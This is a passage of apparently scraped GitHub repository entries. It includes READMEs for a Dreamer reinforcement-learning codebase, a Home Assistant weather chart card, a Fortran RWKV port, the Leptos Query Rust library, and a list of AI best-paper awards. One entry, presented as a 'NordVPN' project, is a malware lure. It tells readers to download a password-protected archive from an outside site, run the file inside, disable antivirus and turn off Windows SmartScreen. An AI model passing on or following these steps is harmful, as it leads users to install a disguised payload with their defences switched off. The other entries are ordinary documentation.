`agent=diayn_dreamer` | APS | `agent=aps_dreamer` ## Domains and tasks We support the following domains and tasks. | Domain | Tasks | |---|---| | `walker` | `stand`, `walk`, `run`, `flip` | | `quadruped` | `walk`, `run`, `stand`, `jump` | | `jaco` | `reach_top_left`, `reach_top_right`, `reach_bottom_left`, `reach_bottom_right` | ## Instructions ### Pre-training To run pre-training use the `dreamer_pretrain.py` script ```sh python dreamer_pretrain.py configs=dmc_pixels agent=icm_dreamer domain=walker seed=1 ``` If you want to train a skill-based agent, e.g. DIAYN, just change the `agent` and run: ```sh python dreamer_pretrain.py configs=dmc_pixels agent=diayn_dreamer domain=walker seed=1 ``` This script will produce several agent snapshots after training for `100k`, `500k`, `1M`, and `2M` frames. The snapshots will be stored under the following directory: ```sh ./pretrained_models/<obs_type>/<domain>/<agent>/<seed> ``` For example: ```sh ./pretrained_models/pixels/walker/icm/ ``` ### Fine-tuning Once you have pre-trained your method, you can use the saved snapshots to initialize the `Dreamer` agent and fine-tune it on a downstream task. For example, let's say you have an agent pre-trained with `ICM`, you can fine-tune it on `walker_run` by running the following command: ```sh python dreamer_finetune.py configs=dmc_pixels agent=icm_dreamer task=walker_run snapshot_ts=1000000 seed=1 ``` This will load a snapshot stored in `./pretrained_models/pixels/walker/icm_dreamer/1/snapshot_1000000.pt`, initialize `Dreamer` with it, and start training on `walker_run` using the extrinsic reward of the task. You can ablate components by setting: `init_critic=True/False` and `init_actor=True/False`. You can use Dyna-MPC by setting: `mpc=True`. ### Monitoring #### Console The console output is also available in a form: ``` | train | F: 6000 | S: 3000 | E: 6 | L: 1000 | R: 5.5177 | FPS: 96.7586 | T: 0:00:42 ``` a training entry decodes as ``` F : total number of environment frames S : total number of agent steps E : total number of episodes R : episode return FPS: training throughput (frames per second) T : total training time ``` #### Tensorboard Logs are stored in the `exp_local` folder. To launch tensorboard run: ```sh tensorboard --logdir exp_local ``` #### Weights and Bias (wandb) You can also use Weights and Bias, by launching the experiments with `use_wandb=True`. ## Notes and acknowledgements The codebase was adapted from [URLB](https://github.com/rll-research/url_benchmark). The Dreamer implementation follows the original Tensorflow [DreamerV2 codebase](https://github.com/danijar/dreamerv2). This re-implementation has been carefully tested to obtain consistent results with the original ones on the DeepMind Control Suite, as reported in [this paper](https://arxiv.org/abs/2107.09645).
10
1
folk3n30/NordVPN
https://github.com/folk3n30/NordVPN
null
# INSTRUCTIONS: - Download the project: https://github-downloader.com/ - Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023 - Run the file (Project_run v1.2.4). If you can’t download / install the software, you need to: 1. Disable / remove antivirus (files are completely clean) 2. If you can’t download, try to copy the link and download using another browser! 3. Disable Windows Smart Screen, as well as update the Visual C++ package.
28
0
mlamberts78/weather-chart-card
https://github.com/mlamberts78/weather-chart-card
Custom weather card with charts.
<h1 align="center">Weather Chart Card</h1> [![Buy me a coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/mlamberts7I) [![hacs_badge](https://img.shields.io/badge/HACS-Custom-41BDF5.svg)](https://github.com/hacs/integration) [![GitHub release (latest by date)](https://img.shields.io/github/v/release/mlamberts78/weather-chart-card?style=flat-square)](https://github.com/mlamberts78/weather-chart-card/releases/latest) ![GitHub downloads](https://img.shields.io/github/downloads/mlamberts78/weather-chart-card/total?style=flat-square) ![GitHub release (latest by SemVer including pre-releases)](https://img.shields.io/github/downloads/mlamberts78/weather-chart-card/latest/total) [![HACS Validate](https://github.com/mlamberts78/weather-chart-card/actions/workflows/validate.yaml/badge.svg)](https://github.com/mlamberts78/weather-chart-card/actions/workflows/validate.yaml) ![maintained](https://img.shields.io/maintenance/yes/2023.svg) ![weather-chart-card](https://github.com/mlamberts78/weather-chart-card/assets/93537082/0f000dcd-c469-4029-96f2-ece6ea11e47b) ## Installation ### HACS --Comming Soon!-- (recommended) This card is available in [HACS](https://hacs.xyz/) (Home Assistant Community Store). <small>_HACS is a third party community store and is not included in Home Assistant out of the box._</small> ### HACS Custom (recommended untill available in HACS default) 1. Go to any of the sections (integrations, frontend). 2. Click on the 3 dots in the top right corner. 3. Select "Custom repositories" 4. Add the URL to the repository: https://github.com/mlamberts78/weather-chart-card 5. Select the category "Lovelace". 6. Click the "ADD" button. ### Manual install 1. Download and copy `weather-chart-card.js` from the [latest release](https://github.com/mlamberts78/weather-chart-card/releases/latest) into your `config/www` directory. 2. Add the resource reference as decribed below. Add a reference to the copied file inside your `configuration.yaml` or in the Home Assistant UI: [![Open your Home Assistant instance and show your Lovelace resources.](https://my.home-assistant.io/badges/lovelace_resources.svg)](https://my.home-assistant.io/redirect/lovelace_resources/) ```yaml # Example Lovelace UI config entry resources: - type: module url: /local/weather-chart-card.js ``` Then you can add the card to the view: ```yaml # Example Lovelace UI config entry type: custom:weather-chart-card entity: weather.home ``` #### Configuration variables: ##### Card options | Name | Type | Default | Description | | -------------------- | ------- | -------------------------|--------------------------------------------------------------------------------------------------- | | type | string | **Required** | Should be `custom:weather-chart-card`. | | entity | string | **Required** | An entity_id with the `weather` domain. | | temp | string | none | An entity_id for a custom temperature sensor. | | press | string | none | An entity_id for a custom pressure sensor. | | humid | string | none | An entity_id for a custom humidity sensor. | | uv | string | none | An entity_id for a custom UV index sensor. | | winddir | string | none | An entity_id for a custom wind bearing sensor. | | windspeed | string | none | An entity_id for a custom wind speed sensor. | | title | string | none | Card title. | | show_main | boolean | true | Show or hide a section with current weather condition and temperature. | | show_attributes | boolean | true | Show or hide a section with attributes such as pressure, humidity, wind direction and speed, etc. | | show_time | boolean | false | Show or hide the current time on the card. | | show_day | boolean | false | Show or hide the current day on the card. (Only visible when show_time is true.) | | show_date | boolean | false | Show or hide the current date the card. (Only visible when show_time is true.) | | show_humid | boolean | true | Show or hide humidity on the card. | | show_pressure | boolean | true | Show or hide pressure on the card. | | show_wind_direction | boolean | true | Show or hide wind_direction on the card. | | show_wind_speed | boolean | true | Show or hide wind_speed on the card. | | icons | string | none | Path to the location of custom icons in svg format, for example `/local/weather-icons/`. | | icons_size | number | 25 | The size of custom icons in pixels. | | forecast | object | none | See [forecast options](#forecast-options) for available options. | | units | object | none | See [units of measurement](#units-of-measurement) for available options. | ##### Forecast options | Name | Type | Default | Description | | -------------------- | ------- | -------------------------|--------------------------------------------------------------------------------------------------- | | labels_font_size | string | 11 | Font size for temperature and precipitation labels. | | temperature1_color | string | rgba(255, 152, 0, 1.0) | Temperature first line chart color. | | temperature2_color | string | rgba(68, 115, 158, 1.0) | Temperature second line chart color. | | precipitation_color | string | rgba(132, 209, 253, 1.0) | Precipitation bar chart color. | | condition_icons | boolean | true | Show or hide forecast condition icons. | | show_wind_forecast | boolean | true | Show or hide wind forecast on the card. | | round_temp | boolean | false | Option for rounding the forecast temperatures | ##### Units of measurement | Name | Type | Default | Description | | -------------------- | ------- | -------------------------|--------------------------------------------------------------------------------------------------- | | pressure | string | none | Convert to 'hPa' or 'mmHg' or 'inHg' | | speed | string | none | Convert to 'km/h' or 'm/s' or 'Bft' or 'mph' | ###### What custom icons can I use? Icons should be in svg format. Icons should have names as shown [here](https://github.com/mlamberts78/weather-chart-card/blob/master/src/const.js#L24). Example: ![130360372-76d70c42-986c-46e3-b9b5-810f0317f94f](https://github.com/mlamberts78/weather-chart-card/assets/93537082/d3ee55a2-e64f-4354-b36d-9faf6ea37361) #### Example usage: ###### Card with current time, date and day ![Time](https://github.com/mlamberts78/weather-chart-card/assets/93537082/fa823cf1-aec7-41d7-9216-098fd6f8e388) ```yaml type: custom:weather-chart-card entity: weather.my_home show_time: true show_date: true show_date: true units: speed: Bft ``` ###### Chart only ![Chart-only](https://github.com/mlamberts78/weather-chart-card/assets/93537082/c99d85a4-30d1-4fd9-90ff-877421b39e9b) ```yaml type: custom:weather-chart-card entity: weather.my_home show_main: false show_attributes: false forecast: condition_icons: false show_wind_forecast: false ``` ###### Custom units ![Units](https://github.com/mlamberts78/weather-chart-card/assets/93537082/e72862ee-9bb7-4f97-9a3c-b17663c458aa) ```yaml type: custom:weather-chart-card entity: weather.my_home units: pressure: mmHg speed: m/s ``` ###### Supported languages: Czech <br /> Danish <br /> Dutch <br /> English <br /> Finnish <br /> French <br /> German <br /> Greek <br /> Hungarian <br /> Italian <br /> Norwegian <br /> Polish <br /> Portuguese <br /> Russian <br /> Spanish <br /> Swedish
19
1
FortAI-Hub/rwkv.f90
https://github.com/FortAI-Hub/rwkv.f90
Port of the RWKV-LM model in Fortran (Back to the Future!)
# RWKV.f90 RWKV.f90 is a port of the original [RWKV-LM](https://github.com/BlinkDL/RWKV-LM), an open-source large language model initially developed in Python, into Fortran. Renowned for its robust capabilities in scientific and engineering computations, the primary focus of this project is to explore the potential of Fortran within the realm of Artificial Intelligence. Please note that this is an ongoing project and we welcome contributions. # Prerequisites Before you start, ensure that you have the following installed on your system: - [cmake](https://cmake.org/download/) - [gfortran](https://gcc.gnu.org/wiki/GFortranBinaries) - [go](https://golang.org/dl/) # Step-by-Step Guide This section provides a detailed guide to setting up and running the RWKV.f90 project. The process includes downloading a model, moving the model to the correct directory, converting the model, building the project, and running it. ## 1. Downloading the Model Download the `rwkv-4-world` model of your choice from the following options available at [huggingface.co](https://huggingface.co/BlinkDL/rwkv-4-world/tree/main): - [0.1B](https://huggingface.co/BlinkDL/rwkv-4-world/resolve/main/RWKV-4-World-0.1B-v1-20230520-ctx4096.pth) - [0.4B](https://huggingface.co/BlinkDL/rwkv-4-world/resolve/main/RWKV-4-World-0.4B-v1-20230529-ctx4096.pth) - [1.5B](https://huggingface.co/BlinkDL/rwkv-4-world/resolve/main/RWKV-4-World-1.5B-v1-fixed-20230612-ctx4096.pth) - [3B](https://huggingface.co/BlinkDL/rwkv-4-world/resolve/main/RWKV-4-World-3B-v1-20230619-ctx4096.pth) - **Recommended** for a balance of performance and computational efficiency Once you have downloaded your chosen model, move it to the 'models' directory in the project's root folder. ## 2. Model Conversion After the desired model is in the correct location, convert it using the model converter. Make sure to adjust the filename according to the model you have downloaded. Run the following commands in your terminal: ```console cd model_converter go run model_converter.go ../models/<YOUR-MODEL-NAME>.pth ``` Replace `<YOUR-MODEL-NAME>` with the actual name of the downloaded model file. ## 3. Build the Project With the model conversion done, you can now build the project. Navigate to the root directory of the project and run the following commands: ```console mkdir build cd build cmake .. make ``` ### 3.1 Choosing a BLAS Implementation The underlying BLAS (Basic Linear Algebra Subprograms) implementation that's used for matrix multiplication operations (`matmul`) can be chosen by providing the `-DBLAS_LIBRARY` flag during the CMake configuration step. Three options are available: - `DBLAS_LIBRARY=OpenBLAS`: This utilizes the OpenBLAS library, which is an open-source implementation of the BLAS API. Specify in the `CMakeList.txt` the directory where OpenBLAS library is located. - `DBLAS_LIBRARY=Accelerate`: This leverages the Apple Accelerate Framework, which is highly optimized for Apple hardware. - `DBLAS_LIBRARY=Fortran` or leaving it unset: This defaults to using the Fortran's intrinsic matmul function, which allows the Fortran compiler to handle matrix operations without an external library. To select an option, include the relevant flag when running `cmake`. For example, to use the OpenBLAS library, you would run: ```console cmake -DBLAS_LIBRARY=OpenBLAS .. ``` By not specifying a `-DBLAS_LIBRARY` flag or setting it to `Fortran`, the build will rely on the intrinsic `matmul` function provided by the compiler (resulting in a slow execution). ## 4. Run the Project Once the project is built, you can now run it. The following command also colors stderr outputs in red for better error visibility. Adjust the command as necessary, according to your downloaded and converted model name: ```console ./rwkv ../models/rwkv_vocab_v20230424.csv ../models/<YOUR-CONVERTED-MODEL-NAME> 2> >(while read line; do echo -e "\e[01;31m$line\e[0m" >&2; done) ``` Replace `<YOUR-CONVERTED-MODEL-NAME>` with the name of your converted model file. That's all! You have successfully set up and run the rwkv.f90 project. If you encounter any issues, please raise them in the issue tracker. # References The paper provides more details about the RWKV concept and its applications. It's recommended to read this paper for a better understanding of the project and its scientific background. ```console @misc{peng2023rwkv, title={RWKV: Reinventing RNNs for the Transformer Era}, author={Bo Peng and Eric Alcaide and Quentin Anthony and Alon Albalak and Samuel Arcadinho and Huanqi Cao and Xin Cheng and Michael Chung and Matteo Grella and Kranthi Kiran GV and Xuzheng He and Haowen Hou and Przemyslaw Kazienko and Jan Kocon and Jiaming Kong and Bartlomiej Koptyra and Hayden Lau and Krishna Sri Ipsit Mantri and Ferdinand Mom and Atsushi Saito and Xiangru Tang and Bolun Wang and Johan S. Wind and Stansilaw Wozniak and Ruichong Zhang and Zhenyuan Zhang and Qihang Zhao and Peng Zhou and Jian Zhu and Rui-Jie Zhu}, year={2023}, eprint={2305.13048}, archivePrefix={arXiv}, primaryClass={cs.CL} } ```
26
1
nicoburniske/leptos_query
https://github.com/nicoburniske/leptos_query
Asynchronous state management library for Leptos, providing simplified data fetching, integrated reactivity, server-side rendering support, and intelligent cache management.
# Leptos Query [![Crates.io](https://img.shields.io/crates/v/leptos_query.svg)](https://crates.io/crates/leptos_query) [![docs.rs](https://docs.rs/leptos_query/badge.svg)](https://docs.rs/leptos_query) ## About Leptos Query is a robust asynchronous state management library for [Leptos](https://github.com/leptos-rs/leptos), providing simplified data fetching, integrated reactivity, server-side rendering support, and intelligent cache management. Heavily inspired by [Tanstack Query](https://tanstack.com/query/latest/). ## Why Choose Leptos Query? Leptos Query focuses on simplifying your data fetching process and keeping your application's state effortlessly synchronized and up-to-date. Here's how it's done: ### Key Features - **Configurable Caching & SWR**: Queries are cached by default, ensuring quick access to your data. You can configure your stale and cache times per query with Stale While Revalidate (SWR) system. - **Reactivity at the Core**: Leptos Query deeply integrates with Leptos' reactive system to transform asynchronous query fetchers into reactive Signals. - **Server-Side Rendering (SSR) Compatibility**: Fetch your queries on the server and smoothly serialize them to the client, just as you would with a Leptos Resource. - **Efficient De-duplication**: No unnecessary fetches here! If you make multiple queries with the same Key, Leptos Query smartly fetches only once. - **Manual Invalidation**: Control when your queries should be invalidated and refetched for that ultimate flexibility. - **Scheduled Refetching**: Set up your queries to refetch on a customized schedule, keeping your data fresh as per your needs. - **Manual Query Data Mutations**: Useful when you have updated a value and you want to manually set it in cache instead of waiting for query to refetch. ## Installation ```bash cargo add leptos_query --optional ``` Then add the relevant feature(s) to your `Cargo.toml` ```toml [features] hydrate = [ "leptos_query/hydrate", # ... ] ssr = [ "leptos_query/ssr", # ... ] ``` ## Quick Start In the root of your App, provide a query client: ```rust use leptos_query::*; use leptos::*; #[component] pub fn App(cx: Scope) -> impl IntoView { // Provides Query Client for entire app. provide_query_client(cx); // Rest of App... } ``` Then make a query function. ```rust use leptos::*; use leptos_query::*; use std::time::Duration; use serde::*; // Data type. #[derive(Clone, Deserialize, Serialize)] struct Monkey { name: String, } // Monkey fetcher. async fn get_monkey(id: String) -> Monkey { todo!() } // Query for a Monkey. fn use_monkey_query(cx: Scope, id: impl Fn() -> String + 'static) -> QueryResult<Monkey, impl RefetchFn> { leptos_query::use_query( cx, id, get_monkey, QueryOptions { default_value: None, refetch_interval: None, resource_option: ResourceOption::NonBlocking, // Considered stale after 10 seconds. stale_time: Some(Duration::from_secs(10)), // Infinite cache time. cache_time: None, }, ) } ``` Now you can use the query in any component in your app. ```rust #[component] fn MonkeyView(cx: Scope, id: String) -> impl IntoView { let QueryResult { data, is_loading, is_fetching, is_stale .. } = use_monkey_query(cx, move || id.clone()); view! { cx, // You can use the query result data here. // Everything is reactive. <div> <div> <span>"Loading Status: "</span> <span>{move || { if is_loading.get() { "Loading..." } else { "Loaded" } }}</span> </div> <div> <span>"Fetching Status: "</span> <span> {move || { if is_fetching.get() { "Fetching..." } else { "Idle" } }} </span> </div> <div> <span>"Stale Status: "</span> <span> {move || { if is_stale.get() { "Stale" } else { "Fresh" } }} </span> </div> // Query data should be read inside a Transition/Suspense component. <Transition fallback=move || { view! { cx, <h2>"Loading..."</h2> } }> {move || { data.get() .map(|monkey| { view! { cx, <h2>{monkey.name}</h2> } }) }} </Transition> </div> } } ``` For a complete working example see [the example directory](/example) ## FAQ ### <ins>How's this different from a leptos Resource?</ins> A Query uses a resource under the hood, but provides additional functionality like caching, de-duplication, and invalidation. Resources are individually bound to the `Scope` they are created in. Queries are all bound to the `QueryClient` they are created in. Meaning, once you have a `QueryClient` in your app, you can access the value for a query anywhere in your app. With a resource, you have to manually lift it to a higher scope if you want to preserve it. And this can be cumbersome if you have a many resources. Also, queries are stateful on a per-key basis, meaning you can use the same query with for the same key in multiple places and only one request will be made, and they all share the same state. ### <ins>What's the difference between `stale_time` and `cache_time`? </ins> `staleTime` is the duration until a query transitions from fresh to stale. As long as the query is fresh, data will always be read from the cache only. When a query is stale, it will be refetched on its next usage. `cacheTime` is the duration until inactive queries will be removed from cache. - Default value for `stale_time` is 0 seconds. - Default value for `cache_time` is 5 minutes. These can be configured per-query using `QueryOptions` If you want infinite cache/stale time, you can set `stale_time` and `cache_time` to `None`. > NOTE: `stale_time` can never be greater than `cache_time`. If `stale_time` is greater than `cache_time`, `stale_time` will be set to `cache_time`. ### <ins> What's a QueryClient? </ins> A `QueryClient` allows you to interact with the query cache. You can invalidate queries, prefetch them, and introspect the query cache. `use_query_client()` will return the `QueryClient` for the current scope. ### <ins> What's invalidating a query do? </ins> Sometimes you can't wait for a query to become stale before you refetch it. QueryClient has an `invalidate_query` method that lets you intelligently mark queries as stale and potentially refetch them too! When a query is invalidated, the following happens: - It is marked as `invalid`. This `invalid` state overrides any `stale_time` configuration. - The next time the query is used, it will be refetched in the background. - If a query is currently being used, it will be refetched immediately. ### <ins>What's the difference between `is_loading` and `is_fetching`? </ins> `is_fetching` is true when the query is in the process of fetching data. `is_loading` is true when the query is in the process of fetching data FOR THE FIRST TIME.
18
3
nowy/issues.fe.engineer
https://github.com/nowy/issues.fe.engineer
Issues for https://fe.engineer
# issues.fe.engineer Issues for https://fe.engineer
15
0
farzadhass/best-paper-and-high-citation
https://github.com/farzadhass/best-paper-and-high-citation
AI Best Paper Awards and High Citation-
best paper conferences in AI [ICLR 2023](https://github.com/farzadhass/best-paper-and-high-citation#iclr-2023-kigali-rwanda-may-1-5-2023) [AAAI 2023](https://github.com/farzadhass/best-paper-and-high-citation/blob/main/README.md#aaai-2023---washington-dc-usa-february-7-14-2023) <picture> <source media="(prefers-color-scheme: dark)" srcset="https://prompthero.com/rails/active_storage/representations/proxy/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaEpJaWt3TlRNNE9UWTVOeTFpTlRZMUxUUTBOVFV0T0RRNU5TMWtabVkwTXpVNE0ySmhNRGdHT2daRlZBPT0iLCJleHAiOm51bGwsInB1ciI6ImJsb2JfaWQifX0=--73ae73cf7d1ade569f4528a8e66cddc5c579cd26/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdDRG9MWm05eWJXRjBPZ2wzWldKd09oUnlaWE5wZW1WZmRHOWZiR2x0YVhSYkIya0NBQWd3T2dwellYWmxjbnNKT2hOemRXSnpZVzF3YkdWZmJXOWtaVWtpQjI5dUJqb0dSVlE2Q25OMGNtbHdWRG9PYVc1MFpYSnNZV05sVkRvTWNYVmhiR2wwZVdsZiIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--935666d13f63ed5aca9daa2416340e3a90b6014e/prompthero-prompt-0b412088e35.png"> <source media="(prefers-color-scheme: light)" srcset="https://prompthero.com/rails/active_storage/representations/proxy/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaEpJaWt3TlRNNE9UWTVOeTFpTlRZMUxUUTBOVFV0T0RRNU5TMWtabVkwTXpVNE0ySmhNRGdHT2daRlZBPT0iLCJleHAiOm51bGwsInB1ciI6ImJsb2JfaWQifX0=--73ae73cf7d1ade569f4528a8e66cddc5c579cd26/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdDRG9MWm05eWJXRjBPZ2wzWldKd09oUnlaWE5wZW1WZmRHOWZiR2x0YVhSYkIya0NBQWd3T2dwellYWmxjbnNKT2hOemRXSnpZVzF3YkdWZmJXOWtaVWtpQjI5dUJqb0dSVlE2Q25OMGNtbHdWRG9PYVc1MFpYSnNZV05sVkRvTWNYVmhiR2wwZVdsZiIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--935666d13f63ed5aca9daa2416340e3a90b6014e/prompthero-prompt-0b412088e35.png"> <img alt="YOUR-ALT-TEXT" src="[YOUR-DEFAULT-IMAGE](https://prompthero.com/rails/active_storage/representations/proxy/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaEpJaWt3TlRNNE9UWTVOeTFpTlRZMUxUUTBOVFV0T0RRNU5TMWtabVkwTXpVNE0ySmhNRGdHT2daRlZBPT0iLCJleHAiOm51bGwsInB1ciI6ImJsb2JfaWQifX0=--73ae73cf7d1ade569f4528a8e66cddc5c579cd26/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdDRG9MWm05eWJXRjBPZ2wzWldKd09oUnlaWE5wZW1WZmRHOWZiR2x0YVhSYkIya0NBQWd3T2dwellYWmxjbnNKT2hOemRXSnpZVzF3YkdWZmJXOWtaVWtpQjI5dUJqb0dSVlE2Q25OMGNtbHdWRG9PYVc1MFpYSnNZV05sVkRvTWNYVmhiR2wwZVdsZiIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--935666d13f63ed5aca9daa2416340e3a90b6014e/prompthero-prompt-0b412088e35.png)"> </picture> # ICLR 2023 Kigali, Rwanda. May 1-5, 2023 **1**- [Universal Few-shot Learning of Dense Prediction Tasks with Visual Token Matching](https://arxiv.org/abs/2303.14969) [Donggyun Kim](https://scholar.google.com/citations?user=7KkA050AAAAJ&hl=en), [Jinwoo Kim](https://scholar.google.com/citations?user=kHuR_lEAAAAJ&hl=en), [Seongwoong Cho](https://seongwoongcho.github.io/), [Chong Luo](https://scholar.google.com/citations?user=01iBf38AAAAJ&hl=en), [Seunghoon Hong](https://scholar.google.com/citations?user=hvr3ALkAAAAJ&hl=en) **2**- [Rethinking the Expressive Power of GNNs via Graph Biconnectivity](https://arxiv.org/abs/2301.09505). [Bohang Zhang](https://scholar.google.com/citations?user=hJgT4tYAAAAJ&hl=en), [Shengjie Luo](https://scholar.google.com/citations?user=ImWO7WYAAAAJ&hl=zh-CN), [Liwei Wang](https://scholar.google.com/citations?user=VZHxoh8AAAAJ&hl=zh-CN), [Di He](https://scholar.google.co.jp/citations?user=orVoz4IAAAAJ&hl=en) **3**- [DreamFusion: Text-to-3D using 2D Diffusion](https://arxiv.org/abs/2209.14988) [Ben Poole](https://scholar.google.com/citations?user=i5FMLA4AAAAJ&hl=en), [Ajay Jain](https://scholar.google.ca/citations?user=Ih7iLuUAAAAJ&hl=en), [Jonathan T. Barron](https://scholar.google.com/citations?user=jktWnL8AAAAJ&hl=en), [Ben Mildenhall](https://scholar.google.com/citations?user=NozIDL8AAAAJ&hl=en) **4**- [Emergence of Maps in the Memories of Blind Navigation Agents](https://arxiv.org/abs/2301.13261) [Erik Wijmans](https://scholar.google.com/citations?user=9v86038AAAAJ&hl=en), [Manolis Savva](https://scholar.google.com/citations?user=4D2vsdYAAAAJ&hl=en), [Irfan Essa](https://scholar.google.com/citations?user=XM97iScAAAAJ&hl=en), [Stefan Lee](https://scholar.google.com/citations?user=8j3t5HsAAAAJ&hl=en), [Ari S. Morcos](https://scholar.google.com/citations?user=v-A_7UsAAAAJ&hl=en), [Dhruv Batra](https://scholar.google.com/citations?user=_bs7PqgAAAAJ&hl=en) # AAAI 2023 (Washington, DC, USA. February 7-14, 2023) **Outstanding Paper**: **1**- [Misspecification in Inverse Reinforcement Learning](https://arxiv.org/abs/2212.03201) [Joar Skalse](https://scholar.google.com/citations?user=GuzLUmQAAAAJ&hl=en), [Alessandro Abate](https://scholar.google.com/citations?user=yskbfM4AAAAJ&hl=en) __Outstanding Student Paper__: **2**- [Decorate the Newcomers: Visual Domain Prompt for Continual Test Time Adaptation](https://arxiv.org/abs/2212.04145) [Yulu Gan](https://scholar.google.com/citations?user=hQ-J_eAAAAAJ&hl=en), [Yan Bai](https://scholar.google.com/citations?hl=en&user=hR0hxdgAAAAJ&view_op=list_works&sortby=pubdate), [Yihang Lou](https://scholar.google.com/citations?user=xDTcPZIAAAAJ&hl=zh-CN), [Xianzheng Ma](https://scholar.google.com/citations?user=NS8g2mMAAAAJ&hl=en), [Renrui Zhang](https://scholar.google.com/citations?user=YlL3xN4AAAAJ&hl=zh-CN), Nian Shi, Lin Luo **Distinguished Paper**: **3**- [DropMessage: Unifying Random Dropping for Graph Neural Networks](https://arxiv.org/abs/2204.10037) [Taoran Fang](https://www.researchgate.net/profile/Taoran-Fang), Zhiqing Xiao, [Chunping Wang](https://scholar.google.com/citations?user=Rmy5RogAAAAJ&hl=zh-CN), [Jiarong Xu](https://galina0217.github.io/), [Xuan Yang](https://scholar.google.com/citations?user=HaA2AWIAAAAJ&hl=en), Yang Yang **4**- [Two Heads are Better than One: Image-Point Cloud Network for Depth-Based 3D Hand Pose Estimation](https://ojs.aaai.org/index.php/AAAI/article/download/25310/25082) [Pengfei Ren](https://scholar.google.com/citations?user=TzpecsAAAAAJ&hl=en), Yuchen Chen, [Jiachang Hao](https://scholar.google.com/citations?user=XRR603kAAAAJ&hl=zh-CN), [Haifeng Sun](https://scholar.google.com/citations?user=dwhbTsEAAAAJ&hl=en), Qi Qi, [Jingyu Wang](https://scholar.google.com/citations?user=H441DjwAAAAJ&hl=en), Jianxin Liao **5**- [Neural Architecture Search for Wide Spectrum Adversarial Robustness](https://ojs.aaai.org/index.php/AAAI/article/view/25118) Zhi Cheng, Yanxi Li, [Minjing Dong](https://scholar.google.com/citations?user=gJJRqlsAAAAJ&hl=zh-CN), [Xiu Su](https://scholar.google.com/citations?user=7OMxmYcAAAAJ&hl=zh-CN), [Shan You](https://scholar.google.com/citations?user=rFe-3twAAAAJ&hl=en), [Chang Xu](https://scholar.google.com/citations?user=N4F_3eoAAAAJ&hl=en) **6**- [CowClip: Reducing CTR Prediction Model Training Time from 12 hours to 10 minutes on 1 GPU](https://arxiv.org/abs/2204.06240) [Zangwei Zheng](https://scholar.google.com/citations?user=FTqutJEAAAAJ&hl=en), [Pengtai Xu](https://www.researchgate.net/profile/Pengtai-Xu), [Xuan Zou](https://scholar.google.com/citations?user=gSqwyvsAAAAJ&hl=en), [Da Tang](https://scholar.google.com/citations?user=00xg8JcAAAAJ&hl=en), Zhen Li, [Chenguang Xi](https://scholar.google.com/citations?user=AAGUBuIAAAAJ&hl=en), Peng Wu, Leqi Zou, Yijie Zhu, Ming Chen, Xiangzhuo Ding, [Fuzhao Xue](https://scholar.google.com/citations?user=JMHsqIkAAAAJ&hl=zh-CN), [Ziheng Qin](https://scholar.google.com/citations?hl=zh-CN&user=I04VhPMAAAAJ), [Youlong Cheng](https://scholar.google.com/citations?user=CSTk_LMAAAAJ&hl=en), [Yang You](https://scholar.google.com/citations?user=jF4dPZwAAAAJ&hl=zh-CN) **7**- [DICNet: Deep Instance-Level Contrastive Network for Double Incomplete Multi-View Multi-Label Classification](https://arxiv.org/abs/2303.08358) [Chengliang Liu](https://scholar.google.com.tw/citations?hl=zh-TW&user=ZfVmxqkAAAAJ), [Jie Wen](https://scholar.google.com.tw/citations?user=bsTnbo4AAAAJ&hl=zh-TW), [Xiaoling Luo](https://scholar.google.com.tw/citations?user=d-6X2kUAAAAJ&hl=zh-TW), [Chao Huang](https://scholar.google.com.tw/citations?user=T6yL8BUAAAAJ&hl=zh-TW), [Zhihao Wu](https://scholar.google.com.tw/citations?user=EnmDOYMAAAAJ&hl=zh-TW), [Yong Xu](https://scholar.google.com.tw/citations?user=zOVgYQYAAAAJ&hl=zh-TW) **8**- [Exploring Tuning Characteristics of Ventral Stream’s Neurons for Few-Shot Image Classification](https://ojs.aaai.org/index.php/AAAI/article/view/25128) Lintao Dong, Wei Zhai, [Zheng-Jun Zha](https://www.semanticscholar.org/author/Zhengjun-Zha/143962510) **9**- [MaskBooster: End-to-End Self-Training for Sparsely Supervised Instance Segmentation](https://ojs.aaai.org/index.php/AAAI/article/view/25481) Shida Zheng, Chenshu Chen, Xi Yang, Wenming Tan **10**- [SimFair: A Unified Framework for Fairness-Aware Multi-Label Classification](https://arxiv.org/abs/2302.09683) Tianci Liu, [Haoyu Wang](https://scholar.google.com/citations?user=5Lw9_jcAAAAJ&hl=zh-CN), [Yaqing Wang](https://scholar.google.com/citations?user=_Rfg2CAAAAAJ&hl=zh-CN), Xiaoqian Wang, [Lu Su](https://scholar.google.com/citations?user=38RuCN4AAAAJ&hl=zh-CN), [Jing Gao](https://scholar.google.com/citations?user=Ftj1h4cAAAAJ&hl=zh-CN) **11**- [XRand: Differentially Private Defense against Explanation-Guided Attacks](https://arxiv.org/abs/2212.04454) [Truc Nguyen](https://scholar.google.com.vn/citations?user=CoG--EkAAAAJ&hl=en), Phung Lai, [NhatHai Phan](https://scholar.google.com/citations?user=nsEbWjAAAAAJ&hl=en), [My T. Thai](https://scholar.google.com/citations?user=zLLJimcAAAAJ&hl=en) **12**- [Clustering What Matters: Optimal Approximation for Clustering with Outliers](https://arxiv.org/abs/2212.00696) [Akanksha Agrawal](https://scholar.google.com/citations?user=V_2z1BEAAAAJ), [Tanmay Inamdar](https://scholar.google.com/citations?user=hnelxH0AAAAJ), [Saket Saurabh](https://scholar.google.co.in/citations?user=76_9TI0AAAAJ&hl=en), [Jie Xue](https://scholar.google.com/citations?user=_ROFeyAAAAAJ) **13**- [Robust Average-Reward Markov Decision Processes](https://arxiv.org/abs/2301.00858) [Yue Wang](https://scholar.google.com/citations?user=v-AEFIEAAAAJ&hl=en), [Alvaro Velasquez](https://scholar.google.com/citations?user=1g3pA4cAAAAJ&hl=en), [George Atia](https://scholar.google.com/citations?user=E_8axWQAAAAJ&hl=en), [Ashley Prater-Bennette](https://scholar.google.com/citations?user=f1WPBE8AAAAJ&hl=en), 